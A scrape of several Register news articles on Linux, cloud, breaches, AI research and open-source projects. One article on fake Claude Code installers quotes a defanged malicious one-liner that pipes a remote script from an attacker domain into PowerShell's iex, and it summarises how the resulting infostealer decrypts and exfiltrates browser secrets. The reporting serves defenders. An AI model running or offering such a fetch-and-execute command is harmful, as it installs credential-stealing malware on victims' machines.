TheRegister
Red Hat blasts RHEL 10.1 into orbit aboard Voyager's micro datacenter
Red Hat Enterprise Linux 10.1 has powered up on board a datacenter orbiting 250 miles or about 400 km above the earth. That RHEL-powered satellite is Voyager’s LEOcloud Space Edge “micro” datacenter, which launched aboard a SpaceX Falcon 9 rocket and hitched a ride on the International Space Station (ISS) back in September. The system is designed to demonstrate the advantages of processing data gathered directly in orbit, rather than sending info back to a terrestrial conventional datacenter. Voyager boasts the reduction in latency makes the system as much as 30x faster than sending all the data back to Earth. Originally developed by LEOcloud prior to its acquisition by Voyager last year, Space Edge is, as its name suggests, a low-power edge compute platform for orbital data processing. Voyager and Red Hat contend that “as commercial and government organizations increase their reliance on space-based data, the ability to process data in orbit is increasingly critical.” And they certainly wouldn’t be the first to suggest that. Faced with power constraints, SpaceX, Amazon, Google, Nvidia and others have all announced plans to put large clusters of AI datacenters in orbit, with some designs aiming to cram 100kW worth of compute onboard a single satellite. The company hasn’t disclosed the hardware used in Voyager’s Space Edge, stating only that it’s a “space-hardened managed cloud infrastructure.” Hardening is certainly a concern for complex electronics operating outside Earth’s atmosphere, where charged particles and radiation can corrupt data or do permanent damage over time. HPE’s Spacebourne compute platform demonstrated many of these challenges during its first mission aboard the ISS in 2017. Over the course of its mission the system, which was composed of mostly off-the-shelf components, suffered several upsets including a power failure and SSDs that failed at an “alarming rate,” HPE's Mark Fernandez said at the time. We’ve reached out to Voyager for comment on the system and what kind of data its “micro” datacenter will process during its mission. We’ll let you know if we hear anything back. It’s safe to assume Space Edge’s compute capacity is limited compared as promotional images show its systems are little larger than a shoebox - and therefore offer less room for components than servers used on earth. What we do know is that RHEL 10.1, along with Red Hat’s Universal Base Image (UBI), are up and running on the ISS. Specifically, Space Edge is running RHEL in image mode, an immutable build of the OS where changes to the most directories will reset to a known good state upon reboot. This means that any issues related to what they call "configuration drift" can be addressed by turning the machine off and back on again, a feature we’ll sure will be popular among many in the IT crowd. Alongside the base OS, Space Edge is also running Red Hat’s UBI container image under Podman, a container runtime interface (CRI) similar to Docker that is rootless and daemonless by default. RHEL 10.1’s arrival in orbit comes amid renewed interest in space driven by the yearning of every great hyperscaler to boldly go and generate tokens where no one has before. Actually, they have, but not at scale. But that’s exactly what SpaceX, Amazon and others have proposed. In pursuit of unlimited power, the two companies have independently filed to put large constellations of AI satellite compute platforms in sun-synchronous orbit. In February, SpaceX filed an application with the Federal Communications Commission to lob a million space-based datacenters into orbit. Meanwhile, Amazon has proposed a slightly smaller constellation with 51,600 data processing satellites. Of course, these plans do have one small problem left to solve. How will they get those sats into orbit for less than the cost of simply building more terrestrial infrastructure? According to one space datacenter startup, the economics of orbital datacenters won’t be viable until the cost to orbit falls to around $10 per kilogram. As of writing, a rideshare aboard a Falcon 9 runs about $7,000 a kilogram. ®
Categories: Linux fréttir
Securing the Untrusted Agentic Development Layer
Join us to learn how to architect a development environment where your builders and their agents can move fast and securely.
Categories: Linux fréttir
Quit VMware and you’ll emerge with more complex and less capable infrastructure
Organizations that decide to reduce their VMware footprints, or quit Virtzilla entirely, will emerge with more complex and less capable infrastructure. That’s the view of Paul Delory, a research vice president with analyst firm Gartner, who yesterday told the company’s IT Infrastructure, Operations & Cloud Strategies Conference in Sydney that there is no technical reason for VMware users to adopt a rival hypervisor, and that no vendor offers a one-for-one replacement for the virtualization pioneer’s flagship Cloud Foundation (VCF) suite. But Delory said Broadcom’s licensing policies, which see it only sell VCF, mean VMware users’ licensing bills typically rise by 300 to 400 percent. Broadcom argues that the full-stack private clouds VCF makes it possible to build are so efficient that VCF quickly pays for itself. The analyst told the conference he thinks those contemplating a move off VMware will do better if they instead focus on application modernization. But he said Broadcom’s price changes, and the prospect the company might hike prices again in future, mean many VMware users will look elsewhere. Those who do, he warned, will end up with more complex infrastructure for two reasons. One is that few organizations will be able to quit VMware entirely, as they run applications with dependencies that aren’t easy or economical to unwind. Reducing or eliminating a VMware rig therefore means adopting multiple replacements, which creates more infrastructure to manage and therefore extra complexity. The other is that no rival hypervisor can match the efficiency or VM density possible when using VMware’s products, so moving means acquiring more hardware. Delory said the best alternatives to VMware are the public cloud, or HCI vendors – these days that acronym denotes both hyperconverged infrastructure and hybrid cloud infrastructure. The analyst warned that HCI vendors, with the exception of Nutanix, have weak migration tools that will leave users needing to create bespoke migration automations using “Ansible and a Rube Goldberg machine.” Public clouds, he said, will welcome customers who move 1,000 or more VMs with free migration services. He recommended against considering OpenStack, which he said remains “too big, too complex, and has too many moving parts for the typical IT shop to handle effectively.” Delory also warned VMware users that migration projects are significant engineering undertakings that require extensive assessment of every application in a fleet to determine its best destination, and the work required to get it there. He reminded VMware users that not every workload is certified to run under non-VMware hypervisors, and that some vendors now offer cloud-native versions of their wares and therefore offer an easier on-ramp to containerised applications. Delory advised exploring those options, and not making architectural decisions that mean you can’t consider moving off VMware. “VMware is betting that you can’t move off and they can jack the price way up,” he said. “That may be a good bet. But don’t make it easy.” The analyst finished his talk by predicting most users will minimize their VMware footprints, rather than eliminating them, and restated Gartner’s prediction that 35 percent of workloads currently running under VMware will operate on a different platform by 2028. ®
Categories: Linux fréttir
Double Canvas breach acknowledged as ShinyHunters sets new pay-or-leak deadline
Ed-tech giant Instructure confirmed two rounds of unauthorized activity affecting its online learning platform Canvas within two weeks as data-theft-and-extortion crew ShinyHunters threatened to leak data it claims belongs to more than 275 million students, teachers, and staff tied to nearly 9,000 schools worldwide. In a security incident update, Instructure apologized for the disruption when Canvas went offline last Thursday, leaving thousands of colleges, universities, and K-12 schools without access to course materials, grades, and due dates during final exams and Advanced Placement testing for many. As of Saturday, the parent company claimed, “Canvas is fully back online and available for use.” And it finally broke its silence on Monday about what happened, admitting not one but two intrusions after criminals exploited a security vulnerability in its Free-for-Teacher learning system, and saying the data thieves stole information including usernames, email addresses, course names, enrollment information, and messages. “Core learning data (course content, submissions, credentials) was not compromised,” the Monday disclosure said. “We're still validating all findings, but we want to be clear about what we understand was and wasn't affected.” On April 29, the online education firm “detected unauthorized activity in Canvas,” immediately revoked the intruder’s access, and initiated a probe into the breach, according to Instructure’s notice posted on its website. On May 7, the company “identified additional unauthorized activity tied to the same incident.” ShinyHunters defaced about 330 Canvas school login portals, also exploiting the same Free-for-Teacher vulnerability, and that caused the ed-tech firm to take Canvas offline and “into maintenance mode to contain the activity.” ShinyHunters claims it stole 3.65 TB of data, including about 275 million records from about 8,800 schools including Harvard, Columbia, Rutgers, Georgetown, and Stanford universities. After moving the pay-or-leak deadline multiple times, ShinyHunters set a final deadline of end-of-day May 12 for individual institutions to contact them directly to negotiate payment - or the group will publish the full dataset. In response, Instructure said it temporarily shut down its Free-for-Teacher accounts. It also revoked privileged credentials and access tokens tied to compromised systems, rotated internal keys, restricted token creation pathways, and added monitoring across all platforms. The education platform hired CrowdStrike to assist with its forensic analysis and incident response, and said it also notified the FBI - which published its own alert on social media - and the US Cybersecurity and Infrastructure Security Agency. This is Instructure’s second breach in less than a year. ShinyHunters claimed to have breached Instructure's Salesforce environment in September 2025, and while Instructure didn’t name the crew in its latest disclosure, it did address the intrusion. “The prior Salesforce-related incident and this Canvas security incident are distinct events involving different systems and circumstances,” the company said. ®
Categories: Linux fréttir
Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the terminal window itself is a 3D canvas that supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created in order to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. “But everything comes with a cost, especially the spinning rat cursor.” Building the fourth temple Parmaksiz’s desire to push the limits of terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
Categories: Linux fréttir
Microsoft researchers find AI models and agents can't handle long-running tasks
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
Categories: Linux fréttir
Cookie thieves caught stealing dev secrets via fake Claude Code installers
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: Linux fréttir
OpenAI can't have incompetent AI consultants ruining the market, so bought its own
OpenAI can’t have inexperienced consultants derailing the AI hype train, so it’s launching a consultancy of its own to help enterprises find the value in its models necessary to justify the spending, revenue that Sam Altman's company desperately needs to cover its infrastructure costs. To support the endeavor, OpenAI has agreed to acquire UK-based AI consulting firm Tomoro. The terms of the acquisition weren’t disclosed. Tomoro will form the backbone of the OpenAI Deployment Company, which will operate as a standalone business unit tasked with helping enterprises find the value that they've been missing from the AI flag bearer's models. But don’t worry, McKinsey. OpenAI’s new Forward Deployed Engineers (FDEs) are only there to make sure you don’t sour enterprises on AI by dragging them down an expensive rabbit hole that fails to deliver value. The new company is backed by the usual assortment of AI-crazed venture capitalists and private equity firms, but several consultancies, including Capgemini, Bain, and yep, McKinsey, have agreed to plow billions into the venture. OpenAI says that its AI consultancy will launch with more than $4 billion of investments. Presumably, these consultancies will call in OpenAI’s FDEs when they need help proving AI can boost productivity and/or cut payroll. According to OpenAI, a typical enterprise engagement will look a bit like this: OpenAI’s FDEs will launch a diagnostic to determine where AI can create the most value, then carry out a select set of PoCs. If successful, the FDEs will then design, build, and deploy production systems that tie into enterprises' existing customer data and tools. The experience gained from these integrations will no doubt be used to improve OpenAI’s models and services. The acquisition of Tomoro would bring approximately 150 FDEs and deployment specialists into OpenAI’s new consultancy unit. The deal is expected to close in the coming months, subject to regulatory approvals. Whether enterprises should hitch their saddle to OpenAI’s success at a time when inference providers and model devs are already jacking prices in an effort to get their infrastructure costs under control is another matter entirely. As we reported last week, with the launch of GPT-5.5, OpenAI once again increased its API pricing. For one million tokens, GPT-5.5 is priced at $5 (input), $0.50 (cached input), and $30 (output), double that of its predecessor. But don’t worry, OpenAI says the model might be more frugal about how it uses those tokens. ®
Categories: Linux fréttir
Debian 14 cracks down on unreproducible packages
About halfway through the Debian 14 “Forky” development process, its release team announced a new goal: deterministic package compilation. The Debian project’s latest Bits from the release team newsletter has a goal which may not sound very big, but will mean significant extra effort in a direction that could prove to be a valuable extra security measure. "Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages," wrote ReleaseTeam member Paul Gevers. "Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility." Of the two links in that paragraph, the independent Reproducible Builds project does not, in this vulture’s humble opinion, explain what it’s all about very clearly. We feel that Debian’s own Reproducible Builds wiki page does it better: It should be possible to reproduce, byte for byte, every build of every package in Debian. The Wikipedia article also has a good clear explanation, and introduces a helpful synonym: deterministic compilation. In other words, if you use the same version of the same compiler with the same options, then every time you compile an identical set of source files, the process ought to result in an identical set of binary files. This is starting to become an industry trend – for instance, when we reported on the release of FreeBSD 15 late last year, we noted that it too now promises reproducible builds. Reproducible builds in Debian have been a long time coming: The Register first reported on Debian’s efforts in this direction way back in 2015. It’s not an easy task, but it’s a useful security measure. The idea is to ensure that binaries have not been tampered with – for instance, modified to insert malware. It permits an additional verification step, so that users or automated tools can check whether the binaries they (or their OS package manager) downloaded are byte-identical to the ones they can compile themselves. Without this, you just have to trust the distributor who compiled your OS – as Ubuntu “self-appointed benevolent dictator for life” Mark Shuttleworth pointed out in 2012. (The Internet Archive has a copy of his long-gone blog post.) We also mentioned reproducible builds when we looked at NixOS Raccoon back in 2022, and tried to explain why it was a desirable thing. (Around the same time, Rocky Linux CEO Greg Kurtzer also told us that it was part of the plan for that project, too.) NixOS is already a little further down the reproducibility trail, and as we reported on its add-on Flox deployment tool in 2024, it also aims to deliver reproducible deployments. This won’t directly make Debian safer. It’s already one of the safer and more stable Linux distros there are, anyway. Instead, it’s about infrastructure changes that make it easier to check the supply chain, and to make it possible to write software that can check and verify that what you’re getting really is what you thought that you were getting. If it all works, you won’t be able to tell any difference – but auditing tools will. Debian 13 came out last August, and so Debian 14 is expected in about a year – although it does not have to stick to a rigorous fixed schedule like the commercially-backed projects. ®
Categories: Linux fréttir
Anthropic’s bug-hunting Mythos was greatest marketing stunt ever, says cURL creator
cURL developer Daniel Stenberg has seen Anthropic’s Mythos, a model the AI biz has suggested is too capable at finding security holes to release publicly, scan his popular open source project. But after the system turned up just a single vulnerability, he concluded the hype around Mythos was “primarily marketing” rather than a major AI security breakthrough. Stenberg explained in a Monday blog post that he was promised access to Anthropic’s Mythos model - sort of - through the AI biz’s Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl’s codebase and later sent him a report. “It’s not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway,” Stenberg explained. “Getting the tool to generate a first proper scan and analysis would be great, whoever did it.” That scan, which analyzed curl’s git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were “confirmed security vulnerabilities” in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report “felt like nothing,” and that feeling was further validated by a review of Mythos’ findings. “Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability,” Stenberg said, bringing us back to the aforementioned number. As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. “The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June,” the cURL meister noted. “The flaw is not going to make anyone grasp for breath.” That said, Mythos did find several other non-security bugs that Stenberg said the team is working on fixing, and he notes that their description and explanation were well done. Mythos can do good work, in other words, but it’s not a ground-breaking, game-changing AI model like Anthropic has claimed. “My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing,” Stenberg said in the blog post. “I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos.” cURL code is no stranger to AI To say cURL has become widely used in its nearly three decades of existence would be an understatement. Its wide reach has meant that its team has been running it through all sorts of static code analyzers and fuzz testing it since well before the dawn of the AI age. With AI’s rise, the cURL team has adapted, meaning Mythos is hardly the first AI to get its fingers on cURL’s codebase. “These tools and the analyses they have done have triggered somewhere between two and three hundred bugfixes merged in curl through-out the recent 8-10 months or so,” Stenberg said of tools like AISLE, Zeropath, and OpenAI Codex Security that’ve tested cURL code. “A bunch of the findings these AI tools reported were confirmed vulnerabilities and have been published as CVEs. Probably a dozen or more.” Stenberg’s experience with AI testing cURL, in other words, makes it a great candidate to see how effective Mythos can really be at finding more than the average AI. As Stenberg noted elsewhere in his blog post, Mythos isn’t doing anything particularly novel when it comes to security discoveries: It might be a bit better at finding things than previous models, but “it is not better to a degree that seems to make a significant dent in code analyzing,” the cURL author noted. Stenberg isn’t an AI doomer when it comes to its ability to improve software design, though. Yes, he may have closed the cURL bug bounty earlier this year due to an influx of sloppy, useless bug reports, but he also noted a few months prior to the bounty closure that some security researchers assisted by AI have made valuable reports. “AI powered code analyzers are significantly better at finding security flaws and mistakes in source code than any traditional code analyzers did in the past,” Stenberg said, adding an important qualifier for the Mythos moment: “All modern AI models are good at this now.” Mythos isn’t any more creative than its creators Both older AI models and security-focused tools like Mythos have a common limitation, as far as Stenberg is concerned: They’re only as good at finding security vulnerabilities as the humans who programmed them. “AI tools find the usual and established kind of errors we already know about. It just finds new instances of them,” Stenberg said. “We have not seen any AI so far report a vulnerability that would somehow be of a novel kind or something totally new.” As for Mythos, Stenberg remains unimpressed, calling it "an amazingly successful marketing stunt for sure" in his blog post. In an email to The Register, Stenberg admitted that it’d be possible for AI models to actually discover new, novel types of vulnerabilities, but he’s still not convinced that they can go beyond what humans are capable of finding, given that they’re limited by our understanding of how software vulnerabilities work. At the end of the day, Stenberg explained, when we talk about security, we’re only talking about code. “Source code is text and it feels like maybe we already know about most ways we can do security problems in it,” he pondered in his email. In other words, like the valuable AI-assisted reports made to the cURL bug bounty program before its closure due to a flood of AI garbage, making valuable use of systems like Mythos is going to require humans to get creative. Sorry, no foisting your critical thinking onto a bot. “Human researchers have always used tools when they look for security problems,” Stenberg told us. “Adding AIs to the mix gives the humans even more powerful tools to use, more ways to find problems. I expect that many security bugs going forward will be found by humans coming up with new ways and angles of prompting the AIs.” Stenberg said that he hopes he’ll actually get his hands on Mythos so he can experiment with its capabilities, but he doesn’t seem to be holding out hope the promised access will materialize. “I have been promised access and for all I know I will eventually get it,” Stenberg told us. “I just don't know when.” ®
Categories: Linux fréttir
Gtk2-NG, next generation of Gtk 2, comes back to life
An effort to revive and reinvigorate the 2002 Gtk2 GUI programming toolkit is growing and gaining interest… as we predicted would happen a few months ago. The gtk2-ng project is reviving and modernizing Gtk2 version 2, which the GNOME developers declared dead back in 2020. We held off on reporting this for a while to see if the idea would gain some support, and it does seem to winning interest and followers. Reviving a 24-year-old toolkit that reached its official end-of-life six years ago is a retrospective sort of undertaking, and as such, it appeals to some modern-but-nostalgic development projects. Development is hosted on the Git instance of the Devuan project, the systemd-free fork of Debian. (Last year, Devuan announced its support of Xlibre, the X.org fork that aims to re-invigorate X11 development.) However, developer Daemonratte announced the fork in a thread on the forums of the Pale Moon browser: GTK2 revival. Pale Moon, as we described in 2021, is a continuing fork of an early version of Firefox. Back in February, when we covered the news that Debian 14 planned to drop Gtk2, we mentioned that this might provide the impetus for a fork. This isn’t the first such fork, and we mentioned then that the Ardour digital audio workstation we last looked at in 2022 maintains its own internal version called YTK. Daemonratte says that they’ve already incorporated some fixes from that, and also from an earlier fork by stefan11111 which has been inactive for a couple of years. They then outline the current goals: Current status: Making it Y2K38-safe Getting rid of all deprecation warnings Patching it for NetBSD and backporting NetBSD-specific patches Testing it on all kinds of hardware Further modernization without breaking ABI Future plans: Implement touch support and smooth scrolling from Ardour’s ytk without breaking ABI, so Ardour can be compiled against gtk2 again Heavily lobby for its adoption in the BSD and systemdfree Linux world Reimplement GtkMozEmbed for UXP, so this wonderful engine can be used in gtk2 projects Gtk originally stood for GIMP Tool Kit: 30 years ago, when the GIMP image editor made its public début, Gtk was the set of tools GIMP’s authors created to make it easier to write GUI apps in C. Six years later, GTK+ 2.0.0 appeared. The new plus symbol in its name represented a new object-oriented design. When Miguel de Icaza announced the GNOME desktop project in 1997, it adopted Gtk instead of the then-semi-commercial Qt that KDE used. Since then, Gtk has been developed along with GNOME. GIMP development is relatively slow: the team finally released version 3.0 a year ago, and it uses Gtk 3. (Last month, it released version 3.2.4.) Since launch, though, the GNOME project has released 39 numbered versions, and in recent decades Gtk has kept pace with GNOME, not GIMP. The last version of Gtk 2 was GTK+ 2.24.0 in 2012. The GNOME developers officially said it was end-of-life with the release of Gtk 4 in 2020. Gtk2-ng is far from the only project to fork and revive an older version of a project which has since been superseded by newer versions from the original team. One of the obvious ones is the MATE desktop, which Argentinian developer Perberos announced in 2011. Saying that, though, Daemonratte stated: "The ultimate vision of this fork is to keep gtk2 alive for software using it right now and to revive gtk2 versions of […] Gnome2 […]. Yes, I don’t have to do this alone and no, Mate is not an option, because they use gtk3 now." It is very much not alone. We have been covering releases of KDE 3 fork the Trinity desktop environment since version 14.0.11 in 2021. This vulture used KDE 1.x back when it was the state of the Linux art, and for us, KDE 3.x was already too big and complicated. For the KDE project’s 20th anniversary in 2016, Brazilian developer Helio Chissini de Castro modernized KDE 1 so that it would build and run on Fedora 25. We didn’t realize this had become an ongoing effort, but it has. From later in the Gtk-ng thread, we learned about MiDesktop, a continuing project based on Osiris, a modernized Qt 2. ®
Categories: Linux fréttir
BWH Hotels guests warned after reservation data checks out with cybercrooks
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. It confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotel customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage. Navigate to sites directly rather than clicking links." ®
Categories: Linux fréttir
Feature freeze for Python 3.15 as first beta released
